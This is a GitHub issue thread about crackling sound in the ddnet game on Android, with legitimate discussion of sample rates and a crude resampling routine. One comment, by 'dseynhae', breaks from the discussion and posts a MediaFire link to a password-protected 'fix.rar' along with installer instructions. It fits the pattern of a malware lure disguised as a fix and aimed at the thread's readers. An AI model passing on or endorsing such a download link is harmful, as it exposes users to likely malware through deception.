### ISSUE TITLE
Sound issues for some Android users

### ISSUE THREAD

**Issue by Robyt3** [ddnet/ddnet#8815]
@headshot2017:

> sound is broken atm but other than that it runs fine
> i hear like crackling/garbage on the music and SFX
> fixed it by changing `snd_rate` to 44100
> it was 48000 by default

@TsFreddie 

> sounds like sampling issue
> i can probably tell what's wrong just by hearing it. i've been dealing with rhythm game and custom audio engine too much.

@BlaiZephyr:
> android version works flawlessly except for map sounds randomly bugging out on server join - can someone reproduce it? - best map would be nostalgia/binary ig - happened 2-3 times, then never again 

We could set the sampling rate to 44100 per default on Android as a workaround, if this fixes the issue for everyone, but I'd like a proper fix for whatever is causing this.

**Comment by dseynhae** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by TsFreddie** [comment]
seems like SDL do give you the actual device sample rate. we stored it in FormatOut. And we do have a resampling algo that resamples from default 48k to FormatOut for CSamples.

would it be possible that the resample code never runs on desktop (bcs modern audio driver does resampling themselves and allows application to provide 48k audio even if the device does not support it and mappers somehow figured only 48k audio does not sound bad so they just thought they have to use 48k audio) and the algo is just fucked up. cuz the resampling code looks very crude, forget about fft, it does not even interpolate.
